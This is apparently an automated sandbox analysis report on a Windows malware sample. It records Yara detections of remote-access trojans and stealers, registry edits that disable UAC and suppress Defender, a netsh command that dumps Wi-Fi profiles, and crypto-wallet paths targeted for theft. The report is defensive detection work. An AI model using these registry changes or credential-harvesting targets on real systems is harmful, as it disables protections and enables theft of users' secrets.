Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ClientAny.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0039CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0039CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_002865E0 LookupAccountNameA,

6_2_002865E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_002C2517 GetTimeZoneInformation,

6_2_002C2517

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 7.2.H3tyh96.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 22.0.ClientAny.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ClientAny.exe PID: 7160, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, type: DROPPED

Disable UAC(promptonsecuredesktop)

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Registry value created: promptonsecuredesktop 0

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration

Registry value created: Notification_Suppress 1

Disables UAC (registry)

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: H3tyh96.exe, H3tyh96.exe, 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, H3tyh96.exe, 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: MSASCui.exe
Source: H3tyh96.exe, H3tyh96.exe, 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, H3tyh96.exe, 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: procexp.exe
Source: H3tyh96.exe, 00000007.00000003.2895571564.00000000070C5000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3702123067.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2906615970.00000000070C5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: H3tyh96.exe, H3tyh96.exe, 00000007.00000002.3299025371.00000000003B2000.00000040.00000001.01000000.0000000A.sdmp, H3tyh96.exe, 00000007.00000003.2801862363.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, ClientAny.exe, 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY

Yara detected BrowserPasswordDump

Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: ae44c30d83.exe PID: 5016, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 75f24a4b40.exe PID: 5036, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000001B.00000002.3084330655.0000000000751000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2993639198.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9e4b3ff3c2.exe PID: 408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.H3tyh96.exe.9b90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3714204728.0000000009B90000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H3tyh96.exe PID: 6728, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.0000000000733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: H3tyh96.exe, 00000007.00000003.3115075404.0000000007208000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldby
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.0000000000733000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: H3tyh96.exe, 00000007.00000003.3056350605.00000000072CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOCK
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
